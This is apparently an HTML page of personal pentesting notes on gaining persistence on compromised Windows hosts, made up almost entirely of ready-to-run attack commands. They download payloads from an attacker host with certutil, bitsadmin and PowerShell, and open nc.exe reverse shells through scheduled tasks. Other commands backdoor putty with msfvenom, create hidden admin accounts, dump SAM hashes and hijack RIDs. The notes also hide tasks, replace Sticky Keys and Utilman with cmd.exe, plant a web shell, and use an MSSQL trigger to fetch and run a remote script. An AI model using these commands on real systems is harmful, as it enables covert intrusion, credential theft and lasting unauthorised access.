.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#persistence">Persistence</a><ul>
<li><a href="#gain-persistence-on-windows">Gain Persistence on Windows</a><ul>
<li><a href="#paths-to-persistence">Paths to Persistence</a></li>
<li><a href="#background-intelligence-transfer-service-bits">Background Intelligence Transfer Service (BITS)</a></li>
</ul>
</li>
<li><a href="#elevate-privileges">Elevate Privileges</a><ul>
<li><a href="#more-stealthy">More stealthy</a></li>
<li><a href="#secedit">secedit</a></li>
<li><a href="#relative-id-rid">Relative ID (RID)</a></li>
</ul>
</li>
<li><a href="#add-to-registry">Add to registry</a></li>
<li><a href="#add-a-service">Add a Service</a><ul>
<li><a href="#meterpreter">Meterpreter</a></li>
<li><a href="#powershell">Powershell</a></li>
</ul>
</li>
<li><a href="#add-scheduled-task">Add Scheduled Task</a></li>
<li><a href="#file-backdoor">File Backdoor</a><ul>
<li><a href="#mimic-pe">Mimic PE</a></li>
<li><a href="#reference-script">Reference Script</a></li>
<li><a href="#file-association">File Association</a></li>
</ul>
</li>
<li><a href="#persistence-via-logon">Persistence via Logon</a><ul>
<li><a href="#startup-directories">Startup directories</a></li>
<li><a href="#registry-keys">Registry Keys</a></li>
<li><a href="#logon-scripts">Logon Scripts</a></li>
</ul>
</li>
<li><a href="#rdp-or-login-screen">RDP or Login Screen</a><ul>
<li><a href="#sticky-keys">Sticky Keys</a></li>
<li><a href="#utilman">Utilman</a></li>
</ul>
</li>
<li><a href="#web-shell">Web Shell</a></li>
<li><a href="#mssql">MSSQL</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="persistence">Persistence</h1>
<ul>
<li>Gain through<ul>
<li>Startup folder persistence</li>
<li>Editing registry keys</li>
<li>Scheduled tasks</li>
<li>SUID</li>
<li>BITS</li>
<li>Creating a backdoored service</li>
<li>Creat user</li>
<li>RDP</li>
</ul>
</li>
</ul>
<h2 id="gain-persistence-on-windows">Gain Persistence on Windows</h2>
<ul>
<li>Browser. Add to trusted sites.</li>
<li>Powershell</li>
</ul>
<div class="codehilite"><pre><span></span><code>Invoke-WebRequest http://&lt;attacker-IP&gt;:&lt;attackerPort&gt;/shell.exe -OutFile .<span class="se">\s</span>hell2.exe
</code></pre></div>
<ul>
<li>DOSprompt</li>
</ul>
<div class="codehilite"><pre><span></span><code>certutil -urlcache -split -f http://&lt;attacker-IP&gt;:&lt;attacker-Port/shell.exe
</code></pre></div>
<ul>
<li>Use <code>multi/handler</code> on attacker and <code>set PAYLOAD windows/meterpreter/reverse_tcp</code> </li>
</ul>
<h3 id="paths-to-persistence">Paths to Persistence</h3>
<ul>
<li>Put in startup directory</li>
</ul>
<div class="codehilite"><pre><span></span><code>C:<span class="se">\U</span>sers<span class="se">\%</span>username%<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\S</span>tart Menu<span class="se">\P</span>rograms<span class="se">\S</span>tartup
</code></pre></div>
<ul>
<li>Put the reverse_shell into <code>%appdata%</code> and add a registry key</li>
</ul>
<div class="codehilite"><pre><span></span><code>reg add <span class="s2">&quot;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&quot;</span> /v Backdoor /t REG_SZ /d <span class="s2">&quot;C:\Users\&lt;USER&gt;\AppData\Roaming\backdoor.exe&quot;</span>
</code></pre></div>
<h3 id="background-intelligence-transfer-service-bits">Background Intelligence Transfer Service (BITS)</h3>
<div class="codehilite"><pre><span></span><code>bitsadmin /create __shell__
bitsadmin /addfile __shell__ <span class="s2">&quot;http://&lt;attacker-IP&gt;:&lt;attacker-Port&gt;/shell2.exe&quot;</span> <span class="s2">&quot;C:\Users\&lt;USER&gt;\Documents\shell2.exe&quot;</span>
</code></pre></div>
<div class="codehilite"><pre><span></span><code>bitsadmin /SetNotifyCmdLine <span class="m">1</span> cmd.exe <span class="s2">&quot;/c shell2.exe /complete __shell__ | start /B C:\Users\&lt;USER&gt;\Documents\shell2.exe&quot;</span>
bitsadmin /SetMinRetryDelay <span class="m">30</span>
bitsadmin /resume
</code></pre></div>
<h2 id="elevate-privileges">Elevate Privileges</h2>
<ul>
<li>Create user <code>net user /add &lt;user&gt; &lt;pass&gt;</code></li>
<li>Add to admin group via <code>net localgroup administrators &lt;user&gt; /add</code> </li>
<li>Check <code>net localgroup Administrator</code></li>
</ul>
<h3 id="more-stealthy">More stealthy</h3>
<ul>
<li>Backup Operator group is more stealthy, no admin by r/w on files</li>
</ul>
<div class="codehilite"><pre><span></span><code>net localgroup <span class="s2">&quot;Backup Operators&quot;</span> &lt;user&gt; /add
net localgroup <span class="s2">&quot;Remote Management Users&quot;</span> &lt;user&gt; /add
</code></pre></div>
<ul>
<li>
<p>The following two groups are assigned through membership of <code>Backup Operators</code></p>
<ul>
<li>SeBackupPrivilege, read files</li>
<li>SeRestorePrivilege, write files</li>
</ul>
</li>
<li>
<p>Any local group is stripped of off its admin permissions when logging in via RDP. Therefore disable the following regkey via</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>reg add HKLM<span class="se">\S</span>OFTWARE<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\C</span>urrentVersion<span class="se">\P</span>olicies<span class="se">\S</span>ystem /t REG_DWORD /v LocalAccountTokenFilterPolicy /d <span class="m">1</span>
</code></pre></div>
<ul>
<li>Afterwards, check if <code>Backup Operators</code> is enabled via <code>whoami /groups</code></li>
<li>Backup <code>SAM</code> and <code>SYSTEM</code> via </li>
</ul>
<div class="codehilite"><pre><span></span><code>reg save hklm<span class="se">\s</span>ystem system.bak
reg save hklm<span class="se">\s</span>am sam.bak
download system.bak
download sam.bak
secretsdump.py -sam sam.bak -system system.bak LOCAL
</code></pre></div>
<ul>
<li>Pass-the-hash via evil-winrm</li>
</ul>
<h3 id="secedit">secedit</h3>
<ul>
<li>Get r/w on files through editing a config file</li>
<li>Export secedit and open it </li>
</ul>
<div class="codehilite"><pre><span></span><code>secedit /export /cfg config.inf
</code></pre></div>
<ul>
<li>Add user to the groups</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">SeBackupPrivilege</span> <span class="o">=</span> <span class="o">[</span>...<span class="o">]</span>,&lt;username&gt;
<span class="nv">SeRestorePrivilege</span> <span class="o">=</span> <span class="o">[</span>...<span class="o">]</span>,&lt;username&gt;
</code></pre></div>
<ul>
<li>Convert the file</li>
</ul>
<div class="codehilite"><pre><span></span><code>secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.infk
</code></pre></div>
<ul>
<li>Add the user to the RDP group via net localgroup like before or do</li>
</ul>
<div class="codehilite"><pre><span></span><code>Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
</code></pre></div>
<ul>
<li>Add &amp; Click user -&gt; Full Control(All Operations)</li>
<li>Set <code>LocalAccountTokenFilterPolicy</code> to <code>1</code> like in the section before</li>
</ul>
<h3 id="relative-id-rid">Relative ID (RID)</h3>
<ul>
<li>UID like in linux<ul>
<li>Administrator has <code>RID = 500</code></li>
<li>Other interactive users <code>RID &gt;= 1000</code></li>
</ul>
</li>
<li>Get RIDs</li>
</ul>
<div class="codehilite"><pre><span></span><code> wmic useraccount get name,sid
</code></pre></div>
<ul>
<li>Assign <code>500</code> to regular user</li>
</ul>
<div class="codehilite"><pre><span></span><code> PsExec64.exe -i -s regedit
</code></pre></div>
<ul>
<li>Open <code>HKLM\SAM\SAM\Domains\Account\Users\&lt;0xRID&gt;</code></li>
<li>Search for RID value as hexadecimal value</li>
<li>Open the key called <code>F</code> and change effective RID at position <code>0x30</code></li>
<li>Insert LE hex of <code>0d500</code>, which is <code>f401</code></li>
</ul>
<h2 id="add-to-registry">Add to registry</h2>
<ul>
<li>Execute on user logon via</li>
</ul>
<div class="codehilite"><pre><span></span><code>reg add <span class="s2">&quot;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&quot;</span> /v Userinit /d <span class="s2">&quot;Userinit.exe, C:\yadda\shell2.exe&quot;</span> /f
</code></pre></div>
<h2 id="add-a-service">Add a Service</h2>
<h3 id="meterpreter">Meterpreter</h3>
<ul>
<li>Inside meterpreter <code>load powershell</code> and <code>powershell_shell</code></li>
</ul>
<div class="codehilite"><pre><span></span><code>New-Service -Name <span class="s2">&quot;&lt;SERVICE_NAME&gt;&quot;</span> -BinaryPathName <span class="s2">&quot;&lt;PATH_TO_BINARY&gt;&quot;</span> -Description <span class="s2">&quot;&lt;SERVICE_DESCRIPTION&gt;&quot;</span> -StartupType <span class="s2">&quot;Boot&quot;</span>
</code></pre></div>
<h3 id="powershell">Powershell</h3>
<ul>
<li>Start a service automatically</li>
</ul>
<div class="codehilite"><pre><span></span><code>sc.exe create SteamUpdater <span class="nv">binPath</span><span class="o">=</span> <span class="s2">&quot;net user Administrator Passwd123&quot;</span> <span class="nv">start</span><span class="o">=</span> auto
sc.exe start SteamUpdater
</code></pre></div>
<ul>
<li>Use a service PE instead</li>
</ul>
<div class="codehilite"><pre><span></span><code>msfvenom -p windows/x64/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span><span class="nv">$ATTACKER_IP</span> <span class="nv">LPORT</span><span class="o">=</span><span class="nv">$ATTACKER_PORT</span> -f exe-service -o SteamUpdater.exe
</code></pre></div>
<ul>
<li>Modify an existing service<ul>
<li>Enumerate all the services</li>
</ul>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>sc.exe query <span class="nv">state</span><span class="o">=</span>all
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* Info about a specific service, start type should be automatic, service start name should be target user
</code></pre></div>
<div class="codehilite"><pre><span></span><code>sc.exe qc &lt;ServiceName&gt;
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* Reconfigure
</code></pre></div>
<div class="codehilite"><pre><span></span><code>sc.exe config FoundService <span class="nv">binPath</span><span class="o">=</span> <span class="s2">&quot;C:\Windows\SteamUpdater.exe&quot;</span> <span class="nv">start</span><span class="o">=</span> auto <span class="nv">obj</span><span class="o">=</span> <span class="s2">&quot;LocalSystem&quot;</span>
sc.exe start FoundService
</code></pre></div>
<h2 id="add-scheduled-task">Add Scheduled Task</h2>
<div class="codehilite"><pre><span></span><code><span class="nv">$A</span> <span class="o">=</span> New-ScheduledTaskAction -Execute <span class="s2">&quot;cmd.exe&quot;</span> -Argument <span class="s2">&quot;/c C&quot;</span><span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments<span class="se">\r</span>shell.exe
<span class="nv">$B</span> <span class="o">=</span> New-ScheduledTaskTrigger -AtLogOn
<span class="nv">$C</span> <span class="o">=</span> New-ScheduledTaskPrincipal -UserId <span class="s2">&quot;NT AUTHORITY/SYSTEM&quot;</span> -RunLevel Highest
<span class="nv">$D</span> <span class="o">=</span> New-ScheduledTaskSettingsSet
<span class="nv">$E</span> <span class="o">=</span> New-ScheduledTask -Action <span class="nv">$A</span> -Trigger <span class="nv">$B</span> -Principal <span class="nv">$C</span> -Settings <span class="nv">$D</span>
Register-ScheduledTask ReverseShell -InputObject <span class="nv">$E</span>
</code></pre></div>
<ul>
<li>Alternatively via <code>schtasks</code></li>
</ul>
<div class="codehilite"><pre><span></span><code>schtasks /create /sc minute /mo <span class="m">1</span> /tn SteamUpdater /tr <span class="s2">&quot;c:\windows\temp\nc.exe -e cmd.exe </span><span class="nv">$ATTACKER_IP</span><span class="s2"> </span><span class="nv">$ATTACKER_PORT</span><span class="s2">&quot;</span> /ru SYSTEM
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* Check task
</code></pre></div>
<div class="codehilite"><pre><span></span><code>schtasks /query /tn SteamUpdater
</code></pre></div>
<ul>
<li>Deleting Security Descriptor of a task to make it invisible. Delete the following key</li>
</ul>
<div class="codehilite"><pre><span></span><code>HKLM<span class="se">\S</span>OFTWARE<span class="se">\M</span>icrosoft<span class="se">\W</span>indows NT<span class="se">\C</span>urrentVersion<span class="se">\S</span>chedule<span class="se">\T</span>askCache<span class="se">\T</span>ree<span class="se">\&lt;</span>taskname&gt;<span class="se">\S</span>D
</code></pre></div>
<h2 id="file-backdoor">File Backdoor</h2>
<h3 id="mimic-pe">Mimic PE</h3>
<div class="codehilite"><pre><span></span><code>msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp <span class="nv">lhost</span><span class="o">=</span><span class="nv">$ATTACKER_IP</span> <span class="nv">lport</span><span class="o">=</span><span class="nv">$ATTACKER_PORT</span> -b <span class="s2">&quot;\x00&quot;</span> -f exe -o puttyX.exe
</code></pre></div>
<h3 id="reference-script">Reference Script</h3>
<ul>
<li>Recycle shortcut of an app to reference a reverse shell script<ul>
<li>Right click -&gt; <code>Properties</code> -&gt; <code>Target</code></li>
</ul>
</li>
<li>Reference the the script <code>certainlynobackdoor.ps1</code> via </li>
</ul>
<div class="codehilite"><pre><span></span><code>powershell.exe -WindowStyle hidden C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\c</span>ertainlynobackdoor.ps1
</code></pre></div>
<ul>
<li>Content of the script <code>certainlynobackdoor.ps1</code></li>
</ul>
<div class="codehilite"><pre><span></span><code>Start-Process -NoNewWindow <span class="s2">&quot;c:\tools\nc.exe&quot;</span> <span class="s2">&quot;-e cmd.exe </span><span class="nv">$ATTACKER_IP</span><span class="s2"> </span><span class="nv">$ATTACKER_PORT</span><span class="s2">&quot;</span>
C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\c</span>alc.exe
</code></pre></div>
<h3 id="file-association">File Association</h3>
<ul>
<li>Change associated <code>ProgID</code> of a file type inside registry <code>HKLM\Software\Classes\</code></li>
<li>Choose a class and <code>&lt;class&gt;/shell/open/command</code> contains the file to be opened as the first argument <code>%1</code> </li>
<li>Chang the argument to a shell script and pass the arg through it</li>
</ul>
<div class="codehilite"><pre><span></span><code>Start-Process -NoNewWindow <span class="s2">&quot;c:\windows\temp\nc.exe&quot;</span> <span class="s2">&quot;-e cmd.exe </span><span class="nv">$ATTACKER_IP</span><span class="s2"> </span><span class="nv">$ATTACKER_PORT</span><span class="s2">&quot;</span>
C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32<span class="se">\N</span>OTEPAD.EXE <span class="nv">$args</span><span class="o">[</span><span class="m">0</span><span class="o">]</span>
</code></pre></div>
<ul>
<li>Change <code>command\default</code> to <code>powershell -windowstyle hidden C:\windows\temp\steamupdater.ps1 %1</code></li>
</ul>
<h2 id="persistence-via-logon">Persistence via Logon</h2>
<h3 id="startup-directories">Startup directories</h3>
<ul>
<li>Users' Startup directory under</li>
</ul>
<div class="codehilite"><pre><span></span><code>C:<span class="se">\U</span>sers<span class="se">\&lt;</span>username&gt;<span class="se">\A</span>ppData<span class="se">\R</span>oaming<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\S</span>tart Menu<span class="se">\P</span>rograms<span class="se">\S</span>tartup
</code></pre></div>
<ul>
<li>Startup directory for all users, put the reverse shell here</li>
</ul>
<div class="codehilite"><pre><span></span><code>C:<span class="se">\P</span>rogramData<span class="se">\M</span>icrosoft<span class="se">\W</span>indows<span class="se">\S</span>tart Menu<span class="se">\P</span>rograms<span class="se">\S</span>tartUp
</code></pre></div>
<h3 id="registry-keys">Registry Keys</h3>
<ul>
<li><code>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</code></li>
<li><code>HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce</code></li>
<li><code>HKLM\Software\Microsoft\Windows\CurrentVersion\Run</code></li>
<li>
<p><code>HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce</code></p>
</li>
<li>
<p>Create <code>Expandable String Value</code> under any of this keys with the value of the reverse shell path</p>
</li>
<li>
<p><code>HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> loads user profile after authentication is done</p>
<ul>
<li>Either <code>shell</code> or <code>Userinit</code> can be appended with a comma separated command</li>
</ul>
</li>
</ul>
<h3 id="logon-scripts">Logon Scripts</h3>
<ul>
<li>
<p><code>userinit.exe</code> checks var <code>UserInitMprLogonScript</code> which cann be used to load logon scripts</p>
</li>
<li>
<p>Create variable <code>UserInitMprLogonScript</code> under <code>HKCU\Environment</code> which gets the reverse shell as a payload</p>
</li>
</ul>
<h2 id="rdp-or-login-screen">RDP or Login Screen</h2>
<h3 id="sticky-keys">Sticky Keys</h3>
<ul>
<li>Press shift x 5 and <code>C:\Windows\System32\sethc.exe</code> will be executed</li>
<li>Take ownership of the binary via</li>
</ul>
<div class="codehilite"><pre><span></span><code>takeown /f c:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\s</span>ethc.exe
icacls C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\s</span>ethc.exe /grant Administrator:F
</code></pre></div>
<ul>
<li>Overwrite with <code>cmd.exe</code> </li>
</ul>
<div class="codehilite"><pre><span></span><code>copy c:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\c</span>md.exe C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\s</span>ethc.exe
</code></pre></div>
<h3 id="utilman">Utilman</h3>
<ul>
<li>Ease of access button is clickable at the login screen, it is executed with system privileges </li>
<li>Take ownership and overwrite with <code>cmd.exe</code></li>
</ul>
<div class="codehilite"><pre><span></span><code>takeown /f c:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\u</span>tilman.exe
icacls C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\u</span>tilman.exe /grant Administrator:F
copy c:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\c</span>md.exe C:<span class="se">\W</span>indows<span class="se">\S</span>ystem32<span class="se">\u</span>tilman.exe
</code></pre></div>
<h2 id="web-shell">Web Shell</h2>
<ul>
<li>Default user is <code>iis apppool\defaultapppool</code></li>
<li>
<p>Has <code>SeImpersonatePrivilege</code> </p>
</li>
<li>
<p><a href="https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx">Download Web Shell</a></p>
</li>
<li>Move shell to <code>C:\inetpub\wwwroot</code> on target</li>
<li>Get the shell via <code>http://$TARGET_IP/shell.aspx</code></li>
</ul>
<h2 id="mssql">MSSQL</h2>
<ul>
<li>
<p>Triggers bind actions such as INSERTs</p>
</li>
<li>
<p>Open Microsoft SQL Server Management Studio</p>
<ul>
<li>Choose windows auth</li>
<li><code>New Query</code></li>
<li>Enable Advance Options via</li>
</ul>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>sp_configure <span class="s1">&#39;Show Advanced Options&#39;</span>,1<span class="p">;</span>
RECONFIGURE<span class="p">;</span>
GO
sp_configure <span class="s1">&#39;xp_cmdshell&#39;</span>,1<span class="p">;</span>
RECONFIGURE<span class="p">;</span>
GO
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* Grant privileges to all users
</code></pre></div>
<div class="codehilite"><pre><span></span><code>USE master
GRANT IMPERSONATE ON LOGIN::sa to <span class="o">[</span>Public<span class="o">]</span><span class="p">;</span>
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* Change to DB
</code></pre></div>
<div class="codehilite"><pre><span></span><code>USE &lt;DATABASE&gt;
</code></pre></div>
<div class="codehilite"><pre><span></span><code>* Create trigger
</code></pre></div>
<div class="codehilite"><pre><span></span><code>CREATE TRIGGER <span class="o">[</span>sql_backdoor<span class="o">]</span>
ON HRDB.dbo.Employees
FOR INSERT AS
EXECUTE AS <span class="nv">LOGIN</span> <span class="o">=</span> <span class="s1">&#39;sa&#39;</span>
EXEC master..xp_cmdshell <span class="s1">&#39;Powershell -c &quot;IEX(New-Object net.webclient).downloadstring(&#39;&#39;http://ATTACKER_IP:8000/evilscript.ps1&#39;&#39;)&quot;&#39;</span><span class="p">;</span>
</code></pre></div>
<ul>
<li>Trigger the trigger by visiting the site which triggers the trigger through a db call</li>
</ul>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
function linkClick(obj) {
if (obj.open) {
console.log('open');
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
sessionStorage.removeItem(obj.id);
}
sessionStorage.setItem(obj.id,"open");
console.log(obj.id);
} else {
console.log('closed');
sessionStorage.removeItem(obj.id);
}
// if (obj.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === obj.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", obj.id);
// console.log(obj);
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
}
//if ( sessionStorage.getItem("opened")) {
// var item = sessionStorage.getItem("opened")
// document.getElementById(item)['open'] = 'open';
//}
let _keys = Object.keys(sessionStorage);
if (_keys) {
for ( let i = 0; i < _keys.length; i++ ) {
document.getElementById(_keys[i])['open'] = 'open';
}
}
// const detailsElement = document.querySelector('.details-sidebar');
// detailsElement.addEventListener('toggle', event => {
// if (event.target.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === detailsElement.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", detailsElement.id);
// console.log(detailsElement);
//
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
// });
//
// async function fetchIndexJSON() {
// const response = await fetch('/index.json');
// const index = await response.json();
// return index;
// }
// // Extract the `q` query parameter
//var queryStringRegex = /[\?&]q=([^&]+)/g;
//var matches = queryStringRegex.exec(window.location.search);
//if(matches && matches[1]) {
// var value = decodeURIComponent(matches[1].replace(/\+/g, '%20'));
//
//
// // fetchIndexJSON()
// // .then(index => { console.log(index['index']);});
// // Load the posts to search
// fetch('/index').then(function(posts) {
// // Remember to include Fuse.js before this script.
//
// var fuse = new Fuse(posts, {
// keys: ['title', 'tags', 'content'] // What we're searching
// });
//
// // Run the search
// var results = fuse.search(value);
// //console.log(results);
//
// // Generate markup for the posts, implement SearchResults however you want.
// // var $results = SearchResults(results);
//
// // Add the element to the empty <div> from before.
//// $('#searchResults').append($results);
// });
//}
</script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
</script>
<script type="text/x-mathjax-config">
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink